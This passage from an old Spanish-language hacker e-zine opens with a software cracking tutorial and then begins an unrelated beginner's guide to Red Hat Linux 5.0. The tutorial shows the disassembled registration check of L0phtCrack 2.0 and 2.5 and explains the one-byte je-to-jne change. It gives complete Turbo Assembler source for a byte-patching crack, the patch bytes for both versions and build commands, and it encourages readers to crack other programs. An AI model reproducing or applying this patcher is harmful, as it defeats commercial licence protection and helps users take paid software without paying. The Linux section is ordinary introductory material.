la llamada al sistema de comparacion la cual diferencia si el programa esta o
no registrado.
NOTA: Mi intencion no es ensen~arles como crackear programas sino hacer un
crack en assembler para poder quitarle la proteccion en cualquier momento
tanto a este programa como a otros, en conclusion este tutorial esta dirigido
a gente que ya tiene conocimientos de crackeo de programas (ingenieria
inversa : modificar programas sin tener el codigo fuente para beneficio
personal, nada que ver con el crackeo de servidores web.)
Este es el trozo de codigo visto bajo W32Dasm que realiza la comprobacion de
registro del L0phtcrack :
L0phtCrack 2.0 (l0phtcrack95.exe):
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401952(C)
|
:0040195A 33C0 xor eax, eax
:0040195C 89442414 mov dword ptr [esp+14], eax
:00401960 89442418 mov dword ptr [esp+18], eax
:00401964 8844241C mov byte ptr [esp+1C], al
:00401968 8B85C0000000 mov eax, dword ptr [ebp+000000C0]
:0040196E 3BC7 cmp eax, edi
:00401970 0F843F020000 je 00401BB5 <- ;-)
:00401976 57 push edi
:00401977 8D8C24D4000000 lea ecx, dword ptr [esp+000000D4]
:0040197E E86D8D0000 call 0040A6F0
:00401983 8D4C2410 lea ecx, dword ptr [esp+10]
:00401987 89BC24D8010000 mov dword ptr [esp+000001D8], edi
:0040198E E88E400200 call 00425A21
y en la ultima version disponible de este programa L0phtcrack 2.5
(l0phtcrack.exe):
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00406247(C)
|
:0040624F 8B85C0000000 mov eax, dword ptr [ebp+000000C0]
:00406255 33D2 xor edx, edx
:00406257 85C0 test eax, eax
:00406259 89542414 mov dword ptr [esp+14], edx
:0040625D 89542418 mov dword ptr [esp+18], edx
:00406261 8854241C mov byte ptr [esp+1C], dl
:00406265 0F8485020000 je 004064F0 <- ;-)
:0040626B 52 push edx
:0040626C 8D8C24E8000000 lea ecx, dword ptr [esp+000000E8]
:00406273 E890AFFFFF call 00401208
En la version 2.5 el sistema de proteccion sigue siendo el mismo, tan solo
cambian las variables (Me tomo un poco mas de tiempo encontrar la rutina de
proteccion, pero en fin... ;-))
De ahora en adelante mostrare como ejemplo solo la version 2.0 ya que se
aplica el mismo procedimiento para desproteger el programa (Cambiar el salto
condicional mostrado en el death listing).
El sistema de proteccion de este programa es malisimo tan solo comprueba si
el valor de edi es igual a eax; si ambos son iguales el programa no esta
registrado; pero si el valor de edi es distinto a eax el programa se salta
todo el proceso de proteccion (nagscreen y limite de 15 dias) y el l0phtcrack
funciona como si se hubiera pagado por el serial de registro.
Solo cambiaremos esta linea de codigo :
:00401970 0F843F020000 je 00401BB5
Por la siguiente:
:00401970 0F853F020000 jne 00401BB5
El je es un salto condicional que significa jump near if equal (Salto cercano
si es igual; eax es igual a edi por lo tanto se produce el salto condicional
a dicha direccion), al cambiarlo a jne (jump near if not equal) salta solo si
los valores comparados no son iguales por lo que obviamente no se produce el
salto.
Antes voy a explicar rapidamente el archiconocido metodo de crackeo con un
editor hexadecimal :-P para mayor claridad.
En el Wdasm32 una vez desemsamblado el Lophtcrack95.exe hacemos doble click
sobre la linea del salto condicional (:00401970) y miramos en la barra de
estado.
Aparece el valor del offset (00000D70h).
NOTA: Si no saben utilizar un desensamblador, un editor hexadecimal, un
compilador o un linker no sacan nada con seguir leyendo este articulo o sea
chao.. :-P
Ingresamos al editor hexadecimal ,abrimos el programa l0phtcrack95.exe y en
la funcion goto ponemos el valor del offset y obtenemos algo similar a esto:
[Byte a cambiar]
00000D60 ..vv .... .... .... .... .... .... 3BC7 .D$..D$.......;.
00000D70 0F84 3F02 0000 578D 8C24 D400 0000 E86D ..?...W..$.....m
00000D80 8D00 008D 4C24 1089 BC24 D801 0000 E88E ....L$...$......
El valor 0F 84 equivale en a la instruccion je por lo que si cambiamos con el
editor ese valor por 0F 85 el cual equivale a la instruccion jne y grabamos
los cambios estaria todo listo.
El programa funcionaria como si hubieramos pagado por el. Pero cada vez que
borremos el programa y luego lo instalemos de nuevo, tendriamos que realizar
todo este tedioso proceso para que funcione como si estuviera registrado.
Es por eso que es mejor crear el crack o un peque~o programilla que haga el
trabajo sucio por nosotros sin tener que hacer todo esto.
Aqui esta un ejemplo de un crack tipo search & destroy para el L0phtcrack95
pero que funcionaria con cualquier programa. Esta escrito en 100% assembler
(Testeado solo con el Borland Turbo Assembler 5.0) espero que le saquen el
maximo provecho a este programilla de ejemplo :-).
------------------------------ Cortar aqui ----------------------------------
.386P ;NOTA: los comentarios (REM) del programa van despues del punto y
Locals ;coma y no afectan la compilacion del programa
jumps
.Model Flat ,StdCall
mb_ok equ 0
hWnd equ 0
ATRIBUTO_NORMAL equ 080h
ABRIR_SIEXISTE equ 3
LECTURA equ 80000000h
ESCRITURA equ 40000000h
; Estas son las llamadas al API de Windows.
extrn ExitProcess : PROC
extrn MessageBoxA : PROC
extrn CreateFileA : PROC
extrn ReadFile : PROC
extrn WriteFile : PROC
extrn CloseHandle : PROC
extrn GetFileSize : PROC
extrn GlobalAlloc : PROC
extrn GlobalFree : PROC
extrn SetFilePointer : PROC
.Data
titulo db "Ejemplo de crack Search & Destroy",0
;titulo de la ventana
texto db "Crack para el L0phtcrack95 2.0",13,10
db "_Bl00dFeaST_ Rulez",13,10 ;texto de la ventana
db "Crack Now!",0
err_tit db "ERROR",0 ;Titulo de la ventana en caso de error
abrirerr db "Error abriendo archivo",0
memerr db "No hay memoria!",0
byterr db "El archivo ya esta crackeado! ",0
listo db "Listo!",0 ;titulo de la ventana si todo va OK
listotxt db "Archivo Crackeado ;-) !",0
archivo db "l0phtcrack95.exe",0 ; Nombre del archivo a
crackear
; Aqui hago me detengo ya que este es la secuencia de bytes a buscar. En
; el Wdasm32 aparece lo siguiente en la linea de codigo a modificar:
;
; :0040196E 3BC7 cmp eax, edi
; :00401970 0F843F020000 je 00401BB5
;
; si se fijan bien a la izquierda estan los valores a reemplazar
; tomamos como minimo 6 bytes como string de busqueda significativo
; ya que este string solo se encuentra una vez en el programa
; si usamos solo el 0F 84 el programa encontraria estos en todos lados
; y los reemplazaria quedando el programa inservible.
original db 03Bh,0C7h,00Fh,084h,03Fh,002h
; si se fijan solo reemplaza el byte 84 por un 85 que + 0F es igual a un jne
; la h al final del valor es para diferenciar de un valor decimal.
nuevos db 03Bh,0C7h,00Fh,085h,03Fh,002h
len equ $-nuevos
fhandle dd ?
memptr dd ?
fsize dd ?
bwrite dd ?
bread dd ?
; Aqui viene el codigo principal no lo voy a detallar por que dudo que todos
; entiendan, los que saben ensamblador saquen sus propias conclusiones ;-)
; Cada procedimiento tiene su respectiva etiqueta para mayor claridad.
.Code
Principal:
push mb_ok
push offset titulo
push offset texto
push hWnd
call MessageBoxA
push 0
push ATRIBUTO_NORMAL
push ABRIR_SIEXISTE
push 0
push 0
push LECTURA + ESCRITURA
push offset archivo
Call CreateFileA
mov fhandle,eax
cmp eax,0FFFFFFFFh
jnz archivo_encontrado
push mb_ok
push offset err_tit
push offset abrirerr
push hWnd
call MessageBoxA
jmp fin_
archivo_encontrado:
push 0
push fhandle
Call GetFileSize
mov fsize,eax
push fsize
push 0
Call GlobalAlloc
mov memptr,eax
cmp eax,0
jnz memoria_ok
push mb_ok
push offset err_tit
push offset memerr
push hWnd
call MessageBoxA
jmp fin_matar_manejo
memoria_ok:
push 0
push offset bread
push fsize
push memptr
push fhandle
Call ReadFile
lectura_ok:
mov edi,memptr
mov ecx,fsize
mov esi,offset original
mov al, byte ptr [esi]
loop_:
repnz scasb
cmp ecx,0
jz no_existe_el_string
aqui_esta_el_string:
push ecx
push edi
push esi
dec edi
mov ecx,len
repz cmpsb
cmp ecx,0
jz crack
no_es_ese:
pop esi
pop edi
pop ecx
jmp loop_
crack:
pop esi
pop edi
pop ecx
dec edi
inc ecx
mov eax,fsize
sub eax,ecx
push 0
push 0
push eax
push fhandle
call SetFilePointer
push 0
push offset bwrite
push len
push offset nuevos
push fhandle
Call WriteFile
push mb_ok
push offset listo
push offset listotxt
push hwnd
call MessageBoxA
jmp fin_matar_todo
no_existe_el_string:
push mb_ok
push offset err_tit
push offset byterr
push hWnd
call MessageBoxA
fin_matar_todo:
push memptr
call GlobalFree
fin_matar_manejo:
push fhandle
call CloseHandle
fin_:
CALL ExitProcess
End Principal
----------------------------- Cortar aqui -----------------------------------
NOTA : Este programa tiene como limitacion que tan solo puede buscar solo una
secuencia de bytes, si deseamos modificar mas bytes es mejor utilizar un
OFFSET PATCHER.
Los offset patcher son cracks que modifican determinados bytes utilizando una
direccion unica para cada byte.
En otra oportunidad hare un tutorial extensivo del uso de los offset patcher.
Para crackear la version 2.5 tienen que usar las siguientes secuencias de
bytes:
Buscar : 024h 01Ch 00Fh 084h 085h 002h
Cambiar: 024h 01Ch 00Fh 085h 085h 002h
Para compilar este search & destroy crack :
Cortamos el codigo y lo grabamos con el nombre patch.asm Luego lo compilamos
(creacion del codigo objeto) con la siguiente instruccion:
tasm32 /mx /m4 /z /q patch
y lo linkeamos con la siguiente (creacion del ejecutable):
tlink32 -x /V4.0 /Tpe /aa /c patch,patch,, import32.lib
Deben tener obligatoriamente una version 32 bits del Borland Turbo Assembler
ya que el codigo es especifico para Windows 95, y la libreria import32.lib
Este codigo no funciona con el compilador de Micro$oft el Masm32.
En internet pueden encontrar la version completa del Turbo Assembler 5.0, Son
como 3 discos zipeados (Altavista, yahoo, lycos ,etc).
Eso es todo, son libres de modificar el codigo fuente a su antojo y crear
cracks para otros programas. Si crean una version que busque y modifique al
menos 2 cadenas de bytes distintas mandenme una copia o solo comentarios a:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Greetz for inspiration (H/V/C) : _masta_, Iczelion, Wintermute, WkT!, 29/A &
CDLR ;-)
Seeya & happy cracking !
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 04. Descubriendo Linux Red Hat 5.0 ::--..
By Mr. Nuk3m
Hola a todos los que estan leyendo esto, yo soy Mr. Nuk3m y voy a tratar de
escribir un manual del sistema operativo Linux Red Hat 5.0. Disculpen las
faltas de ortografia pero no voy a poner acentos, salvo las e~es para que
todos puedan leer este texto sean usuarios de Windows o Linux :)
Me reservo los derechos de autor de este manual por lo que si quieren hacer
modificaciones, avisen primero. Este texto es de libre distribucion, siempre
y cuando aparezcan estas lineas y mi nombre, Mr. Nuk3m.
A continuacion un indice para que puedas buscar lo que te interesa saber de
Linux Red Hat 5.0:
Contenido
Introduccion (lo esta leyendo)
1. Caracteristicas Del Sistema Operativo (S.O.) Linux
1.1 Principales Caracteristicas
1.1.1 Linux y los sistemas de Microsoft
1.1.2 Linux y los sistemas de archivos
1.1.3 Linux y las redes
1.1.4 Linux y la interconeccion con otros sistemas
1.2 Caracteristicas de Hardware requerido y soportado
1.2.1 Hardware requerido por Linux en maquinas con arquitecturas
Intel 80x86
1.2.2 Hardware soportado por Linux
2. Estructura General Del Sistema De Archivos
2.1 Sistema De Archivos
2.1.1 Nombres de archivos
2.1.2 Atributos de los archivos
2.1.3 Directorios
2.1.4 Estructura del sistema de archivos
2.1.5 Rutas dentro del sistema de archivos
2.1.6 Los "links" y los archivos
2.2 Estructura General De Un Sistema De Archivos Linux
3. Usuarios, Permisos y Grupos
3.1 Permisos de acceso
3.2 Directorio "home" y permisos predefinidos
4. Dispositivos De Entrada-Salida
4.1 Conceptos Fundamentales
4.1.1 Puertos de entrada-salida
4.1.2 Iterrupciones e IRQ's
4.1.3 Accesos Directos a Memoria (DMA)
4.2 Tratamiento de los dispositivos en Linux
4.2.1 Archivos de los dispositivos mas comunes
5. Programas y Procesos
5.1 Ejecucion en primer plano y en "background"
5.2 Demonios
6. La Interaccion Con El Sistema. Shell y Comandos
6.1 La Shell
6.1.1 Funcionamiento de la shell
6.2 Comandos
6.2.1 Comandos simples
6.2.2 Separador de comandos
6.3 La Entrada Estandar y La Salida Estandar
6.3.1 Redireccionando la salida
6.3.2 Redireccionando la conexion de errores estandar
6.3.3 Redireccionando la entrada
6.4 Ca~erias
6.5 Generacion De Nombres De Archivos
7. Comandos Y Utilidades
7.1 Movimiento En El Sistema De Archivos
7.2 Listado De Archivos
7.2.1 Moviendo y copiando archivos
7.3 Manipulando Archivos
7.3.1 Moviendo y copiando archivos
7.3.2 Realizando links
7.3.3 Eliminando archivos
7.4 Manipulando Directorios
7.4.1 Creando directorios
7.4.2 Eliminando directorios
7.5 Busqueda De Archivos
7.5.1 Ejemplos del uso de find
7.6 Cambiando Permisos, Grupos y Due~os
7.6.1 Averiguando los derechos de acceso de un archivo
7.6.2 Cambiando los permisos
7.6.3 Cambiando el due~o y el grupo de los archivos
Empecemos con una pregunta clasica, ¨ Por que Linux y no otros S.O. ?
Existen una serie de problemas que son comunes a los sistemas operativos
comerciales y aquellos que, basicamente tienen las siguientes
caracteristicas:
* Cuestan mucho dinero (mas de U$S 50).
* El codigo fuente del S.O. no esta disponible.
* Existen limites estrictos en cuanto a la copia del sistema se refiere.
Consecuentemente, Windows, MacOS, DEC, Ultrix, Solaris, OS/2 son sistemas
operativos comerciales. Linux y FreeBSD son gratituos; estan disponibles
generalmente por el costo del medio (CD-ROOM, DISQUETTES, ETC) en que se
distribuye, el codigo fuente esta disponible y existen pocas limitaciones en
cuanto a su distribucion. Dado que los sistemas operativos comerciales son la
fuente de ingreso de las companias que desarollan estos sistemas, se dan
algunas situaciones que no son ventajosas para el usuario final de la
computadora. Algunos de estos problemas se deben a la necesidad de proteger y
mantener en secreto el codigo fuente, como ser:
* SE ACTUALIZA LENTAMENTE: Los S.O. comerciales como Windows, etc.
realizan actualizaciones importantes cada 2 o 3 a~os (Windows 3.11,
Windows 95, Windows 98 y proximamente Windows 2000), mientras que
existen lanzamientos de las mayores distribuciones de Linux (Red Hat,
Debian, SlackWare) cada 6 u 8 meses y se publica en Internet una version
nueva del Kernel por semana, aproximadamente.
* ALTO COSTO: Una copia y un numero limitado de licencias de cualquier
sistema operativo comercial (especialmente para servidores) cuesta mas
o menos U$S 400 dolares y casi nunca incluyen herramientas de desarrollo,
como servidores de mail, de web, compiladores C, C++, etc.
* SOPORTE TECNICO: Los compradores de S.O. comerciales dependen
exclusivamente del servicio tecnico que brinda la compania en cuestion,
incluso realizando costosas llamadas telefonicas. En la vereda de
enfrente y de una forma descentralizada, existen una gran cantidad de
puntos de consulta para Linux, ya sean organizaciones dedicadas o
particulares experimentados.
Se agregan, ademas, un par de problemas que se aplican casi exclusivamente al
sistema Windows de Microsoft, veamos esto:
* OBSOLENCIA DEL HARDWARE: No se mantiene compatible con los sistemas
anteriores. Se dice que es tecnicamente posible "correr" Windows 95
sobre una PC 386 a 25 Mhz, pero podemos comprobar que hacerlo sobre un
harware anterior a una PC 486 DX2 a 66 Mhz con 16 Mb de Ram es un
ejercicio masoquista :) Y es aca donde el costo aparece nuevamente como
un factor importante a considerar.
* PROPENSO A FALLOS: No es raro observar que Windows se "CAE" sin razon
aparente, y la experiencia personal de quien alguan vez uso un Windows
lo ha demostrado con creses. Aunque su hermano mayor, Windows NT, es
bastante mas estable, todavia se cae con una frecuencia mayor a la que
cualquier usuario espera. Hay casos documentados donde servidores Linux
han estado operando por mas de 1 a~o sin caida alguna :)
Caracteristicas de Linux
Ventajas
* ADECUADO PARA LA COMUNICACION EN RED: Dado que Linux fue desarrollado por
un grupo de programadores de Internet, se le dio una prioridad mayor a
las propiedades de networking. Estas propiedades funcionan muy bien aun
con configuraciones de hardware minimas. Se lo utiliza tanto de cliente
como de servidor de otros S.O. populares; incluso puede ser utilizado por
los proveedores de Internet. Soporta todos los protocolos mas utilizados
(TCP/IP, FTP, Samba, Apple Talk, etc).
* MULTIUSUARIO - MULTITAREA: Sigue la filosofia Unix, lo cual es ventajoso
incluso si lo utiliza una sola persona, dado que las tareas se ejecutan
con una proteccion mayor; ademas un mismo usuario puede estar ejecutando
varias tareas concurrentemente. Linux tiene la capacidad de manejar todo
ese "trafico" de informacion.
Falencias
* INTERFACE DE USUARIO INCONSISTENTE: GNU/Linux refelja el trafico de
varios programadores, cada uno con metas de dise~o diferentes, interfaces
diferentes, etc. Incluso no existe una restriccion de consistencia entre
utilidades de una misma distribucion. Esto puede llevar a confusiones y
frustraciones. Actualmente, se estan llevando a cabo proyectos para
promover interfases graficas consistentes a traves del sistema XWindows
(KDE, GNOME, Teak, etc).
* PAQUETES REPETIDOS: Dentro de una distribucion se pueden encontrar una
gran cantidad de paquetes "repetidos"; cumplen una misma funcion, pero
fueron dise~adas por distintas personas, con objetivos de dise~o. Por
ejemplo: se pueden encontrar varios agentes de transmision de mail como
el sendmail, smail, qmail, exim, etc.
* FALTA DE APLICACIONES COMERCIALES: No se han desarrollado grandes suites
de aplicaciones, aunque en Internet podemos encontrar el Star Office para
Linux ;)
Conclusion
El numero de usuarios de Linux esta creciendo rapidamente. Las ventajas
tecnicas de Linux por sobre otros S.O. comerciales son muy grandes,
importantes y evidentes. A pesar de ello, Linux todavia tiene caracteristicas
que lo hacen un poco dificil de usar y otras que pueden hacer que Linux no
sea el sistema adecuado al momento de elegir.
La mayoria de las personas que hoy son usuarios de Linux, eran usuarios de
los distintos sistemas de Microsoft (Windows, MS-DOS, etc) que se dieron
cuenta de la potencialidad del sistema Linux y de su gran futuro. Hoy hay
una gran tendencia a abandonar los sistemas de Microsoft y sumarse a la
filosofia del sistema operativo Linux. Pero, cuidado, obviamente Linux no
es el sistema ideal en todas las situaciones. No existe tal cosa como la
MEJOR COMPUTADORA o el mejor SISTEMA OPERATIVO; todo va a depender de la
tarea que realizemos. Por eso, no creo que Linux sea la mejor solucion para
todos, por mas que sea tecnicamente superior a muchos S.O. comerciales.
Un usuario se beneficiara enormemente con Linux si lo que necesita es
software para programar :), utilizar Internet :), para procesar texto con
"TeX", y software tecnico en genereal, pero si se necesita fuertemente el
software comercial o si el usuario no se siente comodo aprendiendo y tipeando
comandos, entonces debe buscar en otro lado...
Bueno, bueno, hasta aca llego la introduccion ahora empezamos...
CAPITULO 1
CARACTERISTICA DEL SISTEMA OPERATIVO LINUX
En este capitulo vamos a describir las caracteristicas del S.O. Linux. Es
importante conocer estas caracteristicas ya que explican porque Linux es
un sistema tan potente, versatil y nos daran una amplia vision de algunas
de las caracteristicas internas importantes del sistema. Tambien se
describira el hardware sobre el cual se puede ejecutar Linux y los distintos
dispositivos de entrada/salida que son soportados por el sistema.
Todo lo tratado en este capitulo es aplicable al sistema Linux sobre
plataformas de la familia Intel 80386 y superiores. El nucleo analizado es
la version 2.2.5.
1.1 PRINCIPALES CARACTERISTICAS
Linux es un sistema operativo completo multiusuario con multitarea real.
Esto significa que sobre una misma maquina con el S.O. Linux pueden estar
trabajando varias personas simultaneamente y a su vez cada persona puede
estar ejecutando varios procesos.
Linux es un S.O. de 32 bits desarrollado para la plataforma Intel 80386. Fue
realizado aprovechando las caracteristicas de modo protegido de este
procesador. Asi fue posible implementar la multitarea real y otras
caracteristicas como memoria virtual y ejecutables con carga de paginas por
demanda. Linux es tan robusto y completo que es capaz de ser utilizado en
maquinas en las universidades hasta en largas corporaciones en las cuales
trabajan cientos de personas al mismo tiempo.
El codigo del nucleo de Linux fue realizado pensado en ser compatible con los
estandares de POXIS2 de Unix y otros. Esto quiere decir que es totalmente
compatible con la mayoria de los sistemas Unix comerciales y gratituos que
existen en la actualidad. De esta forma la mayoria del software desarrollado
para otras versiones de Unix funciona perfectamente sobre Linux.
El nucleo es capaz de emular por su cuenta las instrucciones del coprocesador
matematico 80387, con lo que cualquier maquina 80386 sin coprocesador podra
ejecutar, sobre Linux, aplicaciones que requieran de estas instrucciones.
En una maquina 80486, no es necesario que el nucle emule estas instrucciones
ya que el coprocesador se encuentra instalado en el hardware como parte del
procesador.
Otra caracteristica muy importante del sistema es la memoria virtual, que
permite que se puedan ejecutar programas que utilizan mas memoria de la
disponible y que es fundamentalmente necesaria para soportar la multitarea.
Ademas se soportan ejecutables con paginacion por demanda, esto significa
que solo las paginas necesarias son cargadas en memoria en cada momento,
utilizando asi mas efectivamente la memoria del sistema. Relacionado con
esto se encuentra el concepto de area de intercambio o "SWAP" la cual se
utiliza para almacenar temporalmente informacion que no se puede matener
en memoria porque esta no alcanza. Esta area de intercambio es imprescindible
en maquinas que tienen muy poca memoria.
Fuertemente ligado a Linux, y a los sistemas Unix, esta el concepto de
librerias dinamicas. Estas se utilizan para almacenar codigo compartido por
varios programas en una unica libreria. Asi los programas son mas chicos y
utilizan estas funciones.
1.1.1 LINUX Y LOS SISTEMAS DE MICROSOFT
Cabe destacar que Linux NO ES COMPATIBLE con el sistema MS-DOS ni con los
sistemas Windows 95/98/NT. Los sistemas MS-DOS, Windows 95/98 son sistemas
hibridos de 16/32 bits y los programas que se ejecutan sobre estos sistemas
NO PUEDEN SER EJECUTADOS en Linux ya que fueron desrrollados para ser
ejecutados especificamente en esos sistemas. En cuanto al sistema Windows NT
es un sistema de 32 bits con un nucleo completamente nuevo y tambien es
totalmente incompatible con Linux. Sin embargo, todos estos sistemas pueden
convivir tranquilamente en una PC, o sea que sobre cualquier computadora, con
suficiente espacio en el disco duro, es posible tener instalado Linux y
ademas Ms-DOS, Windows 95/98 o NT.
Sobre Linux, existen emuladores de MS-DOS los que permiten que ciertas
aplicaciones de MS-DOS puedan ejecutarse sobre Linux. Uno de los emuladores
mas conocido es el llamado "DOSEMU" y permite ejecutar aplicaciones como
Turbo Pascal, Turbo Assembler, Harvard Graphics, etc. A su vez existe un
proyecto llamado "WINE" (Win Emulator) para permitir ejecutar aplicaciones
Windows sobre el sistema grafico de vantanas X Windows.
1.1.2 LINUX Y LOS SISTEMAS DE ARCHIVOS
Linux posee un sistema de archivos propio, no compatible con los de
Microsoft, llamado "ext2fs" (Extended File System 2 =). Esto quiere decir
que si en una PC tenemos instalados los sistemas Linux y MS-DOS/Win95/98/NT
desde los sistemas de Microsoft no podremos acceder, ni para lectura ni para
escritura, a los sistemas de archivos de Linux.
En cambio Linux es capaz de leer y escribir en sistemas de archivos de MS-DOS
(FAT), de Win95 (VFAT), inclusive con nonbres largos :)) , de Win98 (FAT32),
tambien con nombres largos =) , y de NT (NTFS). Aunque el soporte de
escritura sobre NTFS esta, hasta el momento, desarrollado en forma
experimental y se recomienda no utilizarlo ya que podria da~ar la escritura
de archivos de una particion NTFS.
Ademas de los sistemas de archivos descriptos anteriormente, Linux es capaz
de leer y escribir sobre particiones basadas en sistemas de archivos de
MINIX, FFS (Fast File System), de Apple Macintosh, de los sistemas Unix SCO,
System V, Coherent y Xenix, y UFS de BSD (Unix de Berkeley).
Linux es capaz de leer archivos de particiones OS/2 HPFS del S.O. OS/2 de IBM
y del ADFS (Acorn Disk file System) del S.O. de Acorn. Soporta ademas lectura
desde los CD-ROM's sobre el sistema de archivos estandar que es el ISO9660.
Ademas de esto podemos aplicar sobre el sistema de archivos ext2fs porciones
del disco limitadas a cada usuario. Esto es conocido como "QUOTAS" y sirve
para limitar la cantidad de espacio de espacio de almacenamiento en disco que
cada usuario es capaz de usar.
1.1.3 LINUX Y LAS REDES
Cuando hablamos de redes, Linux es la opcion. No solo porque el trabajo en
red esta altamente integrado con el sistema operativo, sino que ademas una
infinidad de aplicaciones de libre distribucion se encuentran disponibles y
que, mas importante aun, es totalmente robusto bajo una gran carga, lo que
es un resultado de a~os de desarrollo, testeo y correccion basados en el
proyecto Open Server.
Linux tiene realizada como parte de su nucleo una implementacion completa de
los protocolos de la famila TCP/IP muy eficiente y con soporte para muchos
conceptos avanzados de trabajo en redes.
Linux puede funcionar como servidor de WWW en Internet de forma excelente. Es
mas el servidor APACHE mediante el cual se puede instalar un servidor WWW
sobre Linux, es el servidor de WWW mas utilizado en Internet y en Itranets
actualmente. Ademas Linux es capaz de funcionar como cliente de WWW, ya sea
en una maquina conectada permanentemente a Internet o mediante modem (PPP).
Esto no es lo unico que se puede realizar con un sistema Linux. Linux es
capaz de actuar de servidor PROXY, ser utilizado como FIREWALL, como ROUTER
avanzado o como BRIDGE (puente). Tiene soporte para alias de IP, protocolos
IPX/SPX, protocolos IPv6, AppleTalk, X.25, ISDN, PPP, SLIP, PLIP, etc.
A nivel aplicaciones, Linux esta acompa~ado de innumerables aplicaciones como
lo son:
* Sendmail: Puede actuar de servidor de mail, ya sea para enviar, recibir y
realizar un sin numero de tareas relativas al correo electronico. Sendmail es
el servidor de mail mas utilizado en Internet.
* Ftp: Linux puede actuar como servidor o cliente de ftp (File Transfer
Protocol). Un servidor de FTP es capaz de permitir que los clientes se
conecten y recuperen archivos disponibles en el servidor.
* Noticias (NEWS): Existen varias implementaciones del protocolo NNTP, el
cual sirve para permitir que una red de computadoras sobre Internet
intercambien articulos que cubre todo tipo de topicos o tematicas.
* DNS (Domain Name System): Un servidor DNS tiene el trabajo de traducir los
nombres utilizados en Internet como por ejemplo www.linux.org en direcciones
de IP. El trabajo de DNS sobre Unix/Linux lo realiza un programa llamado
"NAMED".
* Telnet: Telnet es un programa que permite a una persona usar una
computadora remota como si estuviera trabajando directamente sobre la misma.
1.1.4 LINUX Y LA INTERCONECCION CON OTROS SISTEMAS
Linux puede interactuar completamente con varios sistemas conocidos
compartiendo archivos e impresoras en una red. Esto hace posible integrar una
maquina Linux con cualquiera de los sistemas mas utilizados actualmente y
permitir su total conectividad.
Los sistemas con los que Linux puede ser usado para compartir recursos son
los siguientes:
* Apple: Linux soporta la familia de protocolos AppleTalk. Linux permite a
clientes Macintosh ver recursos de un servidor Linux, asi como otros clientes
Macintosh en una red y compartir archivos e impresoras desde el servidor
Linux.
* Entorno Windows: El grupo de aplicaciones SAMBA, que es provisto con el
S.O. Linux, permite interactuar a un sistema Linux como servidor o cliente de
maquinas con Windows 95/98, Windows NT, DOS o Windows For Workgroups.
* Novell Netware: A traves del protocolo IPX, Linux puede ser configurado
para actuar como un servidor o un cliente NCP, y permitiendo asi servicios de
archivos e impresoras en redes Novell.
* Entornos Unix: La manera mas conocida y eficiente de compartir archivos en
entornos Unix es mediante NFS (Network File Sharing). Este protocolo fue
originalmente desarrollado por Sun Microsystems. Es una manera de compartir
archivos entre maquinas de forma que parezca que son archivos locales. Asi se
puede tener una maquina totalmente funcional sin necesidad de tener un disco
rigido instalado.
1.2 CARACTERISTICAS DE HARDWARE REQUERIDO Y SOPORTADO
1.2.1 HARDWARE REQUERIDO POR LINUX EN MAQUINAS CON ARQUITECTURA INTEL 80x86
Linux requiere como configuracion minimima de hardware una maquina con
procesador 80386 con 2 Mb de memoria RAM y 40 Mb de espacio libre en disco
rigido y puede correr tranquilamente sobre esta configuracion. Para utilizar
el modo grafico (vale la pena, Sistema X Windows ;) necesita al menos 8 Mb de
RAM y 100 Mb de espacio en disco.
Linux puede trabajar con los buses ISA, VLB (Vesa Local Bus), EISA y PCI.
Ademas puede trabajar en sistemas con arquitectura PS/2 MCA (Micro Channel
Architecture).
Linux puede correr, ademas, en la familia de PC's portables, desde las 80386
en adelante, inclusive con su sistema grafico.
1.2.2 HARDWARE SOPORTADO POR LINUX
PROCESADORES, UNIDADES DE PUNTO FLOTANTE Y MEMORIAS
Es totalmente compatible con los microprocesadores 386 SX / DX / SL / DXL /
SLC, 486 DX / SL / SX2 / DX2 / DX4 de Intel/AMD/Cyrix, Pentium, Pentium MMX,
Pentium Pro, Pentium II y III de Intel, K5, K6, K6-2 3D de AMD, y todos los
procesadores de la familia Cyrix.
Linux posee emulacion de unidad de punto flotante para servir de soporte a
los procesadores que no tiene coprocesador matematico como lo son los 386 o
los 486/SX.
Ademas una caracteristica muy pontente de Linux es que se provee soporte para
sistemas con multiples CPU's (SMP).
Con respecto a las memorias, todas las memerias DRAM, FPM, EDO o SDRAM pueden
ser utilizadas con Linux.
CONTROLADORES DE UNIDADES DE DISCO RIGIDO, DISQUETTES, CD-ROM Y UNIDADES DE
CINTA
Linux puede trabajar con las controladoras estandar de disco IDE, MFM y RLL.
Tambien hay soporte para interfaces IDE extendidas (EIDE), con hasta dos
interfaces IDE y 4 discos y/o unidades de CD-ROM. Linux detectara las
siguientes interfaces EIDE:
* CMD-640
* DTC 2278D
* FGI/Holtek HT-6560B
* RZ1000
* Triton I y II con Bus-Master DMA
Estas interfaces son las mas utilizadas en las computadoras personales y en
general Linux no tendra ningun problema en detectarlas.
Linux funcionara tambien con la interface mas moderna IDE/ATAPI, ya se para
discos, unidades de CD-ROM, unidades de discos flexible o unidades de cinta.
Es posible, ademas, utilizar las modernas unidades Zip de Iomega, ya sea por
el puerto paralelo o SCSI.
UNIDADES DE CD-ROM (NO IDE) (NO SCSI)
Es factible (ja de donde salio esa palabra :) utilizar sobre Linux las
siguientes unidades de CD-ROM: Aztech, Creative Labs (una cagada), Goldstar,
IBM, Panasonic, Mitsumi, Sanyo, Sony, Teac.
ULTRA-DMA
Linux puede trabajar con las interfaces de disco con Ultra-DMA mas conocidas
del mercado. (Bus-Master, VIA, etc.).
SCSI
Linux soporta una gran cantidad de interfaces controladoras SCSI. Entre las
mas importantes encontramos: Adaptec, BusLogic, DTC, Future Domain, NCR,
Seagate, UltraStor, Quantum, Iomega y Western Digital.
ADAPTADORES DE RED
De forma similar, Linux soporta una amplia variedad de trajetas de red
Ethernet com lo son: 3Com, AMD, AT&T, Cabletron, DEC, Fujitsu, HP, Intel
EtherExpress, Novell NE2000/1000, SMC, Western Digital, Zenith.
Ademas soporta varias tarjetas de red ISDN, ARCNet, Token Ring, FDDI, Amateur
Radio, PCMCIA, Frame Relay, como otras intefaces (que no utilizan tarjetas)
SLIP, PPP o PLIP.
TARJETAS DE SONIDO
Las tarjetas de sonido mas importantes soportadas por Linux son las
